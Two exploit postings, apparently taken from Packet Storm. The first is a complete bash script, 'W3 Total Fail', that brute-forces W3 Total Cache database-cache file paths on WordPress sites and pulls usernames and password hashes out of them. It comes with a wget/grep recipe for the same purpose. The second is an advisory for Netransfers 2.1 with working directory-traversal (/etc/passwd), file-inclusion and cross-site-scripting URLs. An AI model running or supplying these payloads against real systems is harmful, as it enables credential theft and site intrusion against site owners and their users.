This is an exploit for W3 Total Cache called W3 Total Fail that works by attempting to guess SQL queries that might contain important password hashes. #!/bin/bash # (C) Copyright 2012 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved. # # |---------------| # | W3 Total Fail | # | by zx2c4 | # |---------------| # # For more info, see built-in help text. # Most up to date version is available at: http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh # # This affects all current versions of W3 Total Cache up to and including the latest version, 0.9.2.4. set -f printf "\033[1m\033[31m" echo "<===== W3 Total Fail =====>" echo "< >" echo "< by zx2c4 >" echo "< >" echo "<=========================>" echo echo printf "\033[0m\033[1m" echo "W3 Total Fail works by attempting to guess SQL queries that might" echo "contain important password hashes. It walks through" printf "\033[0m" echo " http://\$wordpress/wp-content/w3tc/dbcache/..." printf "\033[1m" echo "until it's found the right files. If this directory has directory" echo "index listings turned on, you might have more luck downloading the" echo "entire folder and grepping locally for patterns, like so:" printf "\033[0m" echo " \$ wget -np -r http://\$wordpress/wp-content/w3tc/dbcache/" echo " \$ grep -Ra user_pass ." printf "\033[1m" echo "If directory listings are not available, then this is the tool for" echo "you, as it will try to brute force possible w3tc keys. It will try" echo "25 user ids and 25 site ids. Adjust the script for more or less range." echo echo "Enjoy!" echo echo "- zx2c4" echo "Dec 24, 2012" echo printf "\033[0m" printf "\033[0m\033[36m" echo "Usage: $0 HOST [URLBASE] [DBPREFIX]" echo echo "HOST should be the name of the host that is stored by wordpress. It" echo "may be the actual host name of the server, or it might be something" echo "different, depending on how wordpress is configured." echo "Example: blog.zx2c4.com" echo echo "URLBASE is the base URL of the wordpress blog which are prefixed in" echo "forming HTTP requests. If not specified it will default to http://\$HOST" echo "Example: http://blog.zx2c4.com or https://someblahblasite.com/my_blog" echo echo "DBPREFIX is the wordpress prefix used for database table names. It" echo "is often \"wp_\", which DBPREFIX defaults to if this argument is" echo "unspecified. Some wordpress installations will use an empty prefix," echo "and others use a site-specific prefix. Most, however, will use the" echo "default." echo "Example: wp_" echo printf "\033[0m" if [ $# -lt 1 ]; then echo "Error: HOST is a required argument." exit 1 fi host="$1" urlbase="${2:-http://$host}" db_prefix="$3" [ $# -lt 3 ] && db_prefix="wp_" for site_id in {1..25} 0; do for user_id in {1..25}; do query="SELECT * FROM ${db_prefix}users WHERE ID = '$user_id'" key="w3tc_${host}_${site_id}_sql_$(echo -n "$query"|md5sum|cut -d ' ' -f 1)" hash="$(echo -n "$key"|md5sum|cut -d ' ' -f 1)" hash_path="${hash:0:1}/${hash:1:1}/${hash:2:1}/${hash}" url="$urlbase/wp-content/w3tc/dbcache/$hash_path" printf "\033[33m" echo -n "Attempting" printf "\033[0m" echo " $url..." curl -s "$url" | tail -c +5 | tr -d '\n' | sed -n 's/.*"user_login";s:[0-9]\+:"\([^"]*\)";s:[0-9]\+:"user_pass";s:[0-9]\+:"\([^"]*\)".*/\x1b[1m\x1b[32mUsername: \1\nPassword hash: \2\x1b[0m\n/p' done; done Source: http://packetstormsecurity.org

Netransfers version 2.1 suffers from cross site scripting, local file inclusion, and directory traversal vulnerabilities. # Exploit Title: Netransfers V2.1 Multiple vulnerability # Date: 19.12.2012 # Exploit Author: d3b4g # Vendor Homepage: http://marioemoreno.com/netransfers-demo/ # Tested on:Windows 7 # Blog: d3b4g.me --------------------------------------------------------------------- [1]Directory Traversal Vulnerability ------------------------------------ http://localhost/[path]/index.php?lang=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. [2] Localfile Inclusion ------------------- http://localhost/[path]/search.php?lang= [evil site] [3] XSS --------------- http://localhost/[path]/tours_step2.php?lang=espanol%27%22()&%%3CScRiPt%20%3Eprompt(xss)%3C/ScRiPt%3E Source: Packet Storm